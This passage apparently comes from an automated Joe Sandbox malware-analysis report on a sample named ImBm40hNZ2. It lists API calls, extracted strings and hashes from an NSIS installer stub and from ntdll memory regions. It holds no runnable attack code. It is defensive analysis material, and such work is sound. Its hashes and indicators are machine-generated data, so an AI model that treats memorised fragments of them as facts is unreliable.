                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(0042D340,00429820), ref: 00404424
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042D340), ref: 00404430
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404442
                                                                                                                                                                                                                                                                  • Part of subcall function 00405389: GetDlgItemTextA.USER32(?,?,00000400,00404479), ref: 0040539C
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,00434000,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,00434000,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharPrevA.USER32(?,?,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(004287F0,?,?,0000040F,?,004287F0,004287F0,?,00000000,004287F0,?,?,000003FB,?), ref: 004044FD
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404518
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000400,004287E0), ref: 0040459E
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                                                                                                                                                • String ID: A
                                                                                                                                                                                                                                                                • API String ID: 2246997448-3554254475
                                                                                                                                                                                                                                                                • Opcode ID: b3b7e376e707d9eda9690b5ceb933977ae0e1f069ee966c462b3593b74f8338b
                                                                                                                                                                                                                                                                • Instruction ID: 21907f09a7f0adac02db5a20439709df020a6e4e4535a3db2c95f33fac12625f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3b7e376e707d9eda9690b5ceb933977ae0e1f069ee966c462b3593b74f8338b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 039171B1900219BBDB11AFA1CC85BAF77B8EF84314F10447BFA04B62C1D77C9A418B69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405C64
                                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(0042D340,00000400), ref: 00405CDF
                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0042D340,00000400), ref: 00405CF2
                                                                                                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405D2E
                                                                                                                                                                                                                                                                • SHGetPathFromIDListA.SHELL32(?,0042D340), ref: 00405D3C
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00405D47
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(0042D340,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D69
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(0042D340,?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405DBB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D63
                                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CAE
Memory Dump Source
• Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                • API String ID: 900638850-730719616
                                                                                                                                                                                                                                                                • Opcode ID: f67fc36d875180e0be9eee5385700d9ad82d05813cf02bda3c13f2274c01b590
                                                                                                                                                                                                                                                                • Instruction ID: 03bbcc83ae8db2cba80ea7df372ba0a8a6f53f324bd5ae32260a6f1a1bd8d9a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f67fc36d875180e0be9eee5385700d9ad82d05813cf02bda3c13f2274c01b590
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E61F271A04A05AEEF215B65CC88BBF3BA5DF11704F20813BE901B62D1D27D5882DF5E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402C3A
                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00435C00,00000400), ref: 00402C56
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: GetFileAttributesA.KERNEL32(00000003,00402C69,00435C00,80000000,00000003), ref: 00405826
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,00434C00,00434C00,00435C00,00435C00,80000000,00000003), ref: 00402CA2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00402C79
                                                                                                                                                                                                                                                                • soft, xrefs: 00402D17
                                                                                                                                                                                                                                                                • Inst, xrefs: 00402D0E
                                                                                                                                                                                                                                                                • Null, xrefs: 00402D20
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E01
Memory Dump Source
• Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                                                                                • API String ID: 4283519449-1074636621
                                                                                                                                                                                                                                                                • Opcode ID: 737df57802bde90b1dd81f9f9cbaf29b7d289456ab0cf199b5c66e23c5e8ffc4
                                                                                                                                                                                                                                                                • Instruction ID: c80feb63f856711914d44cd07d0e36175ef9d189e1e49feff23a0d5b70f6312c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 737df57802bde90b1dd81f9f9cbaf29b7d289456ab0cf199b5c66e23c5e8ffc4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB51D331A00214ABDB209F65DE89B9E7AB4AB04719F10413BF905B72D1D7BC9D818BAD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: HEAP:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                                                                                                                                • Opcode ID: 915663368170c6debb51f04dc9acde7cbfd44a7c79be637b91f9ba5f877e766f
                                                                                                                                                                                                                                                                • Instruction ID: fbb1859042b6f53be2c0bd65957422cbc4bb2387cf054a70bfe35b4fc13fcb4a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 915663368170c6debb51f04dc9acde7cbfd44a7c79be637b91f9ba5f877e766f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99A19A75A08312CFD714DE28C895A1AB7EAFF88390F18852DE945DB310EB70EC55CB91
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 339744AB
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33974507
                                                                                                                                                                                                                                                                • Execute=1, xrefs: 3397451E
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33974530
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 33974592
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33974460
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3397454D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                                • Opcode ID: 914bb44c4598b368ed9b40273cddf84420b7d88b12389adc9dc14d96b9294fc0
                                                                                                                                                                                                                                                                • Instruction ID: 4d79e83c014845ae4c29f91394e49173cfb8ec8ae82eb090322b7d78f873b130
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 914bb44c4598b368ed9b40273cddf84420b7d88b12389adc9dc14d96b9294fc0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 825137B1A01309EAEB15AB94DC94FAD73ACEF06394F0404E9E505AB582EB709A41CF61
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Actx , xrefs: 33967819, 33967880
                                                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33967807
                                                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 339677E2
                                                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 339677DD, 33967802
                                                                                                                                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 339678F3
                                                                                                                                                                                                                                                                • SsHd, xrefs: 3391A304
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                                                                                                                                • Opcode ID: 012fc69f3045fbc2e4c1db580794e13263b871d84eb161831d3b728098d82941
                                                                                                                                                                                                                                                                • Instruction ID: f6b8081ab50de983a2eaffd5c48a1fba34f22d3f594eb5feeb053dfee31c8e5f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 012fc69f3045fbc2e4c1db580794e13263b871d84eb161831d3b728098d82941
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEE1E474E08309CFE715CE68C89071AB7E9BB843A4F540A2DF8A5EB291D731DC55CB81
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Actx , xrefs: 33969315
                                                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33969178
                                                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33969153
                                                                                                                                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33969372
                                                                                                                                                                                                                                                                • GsHd, xrefs: 3391D794
                                                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 3396914E, 33969173
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                                                                                                                                • Opcode ID: a7475e96539a95bac44b033e86228e86a20f16dbdcee9fe96fc595347c871a65
                                                                                                                                                                                                                                                                • Instruction ID: bde7626affe76aec7d1e68afcb4ef0bfdae75150ccac863142f71c7c3687e2cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7475e96539a95bac44b033e86228e86a20f16dbdcee9fe96fc595347c871a65
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFE1B174A05346CFE710CF18C880B5BB7ECBF883A8F544A6DE8959B291D771E854CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402ECA
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402F6F
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F98
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00402FA8
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 00402FD6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                                                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                                                                                                                                • API String ID: 4209647438-2449383134
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 338F651C
                                                                                                                                                                                                                                                                  • Part of subcall function 338F6565: RtlDebugPrintTimes.NTDLL ref: 338F6614
                                                                                                                                                                                                                                                                  • Part of subcall function 338F6565: RtlDebugPrintTimes.NTDLL ref: 338F665F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 339597B9
                                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 338F6446
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 339597A0, 339597C9
                                                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33959790
                                                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 33959783, 33959796, 339597BF
                                                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3395977C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 00403F03
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403F1F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403F2B
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403F37
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403F4A
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403F5A
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403F74
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403F7E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $$@$@wv
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2230787357
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3492000579
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33959854, 33959895
                                                                                                                                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33959885
                                                                                                                                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33959843
                                                                                                                                                                                                                                                                • LdrpLoadShimEngine, xrefs: 3395984A, 3395988B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040272C
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
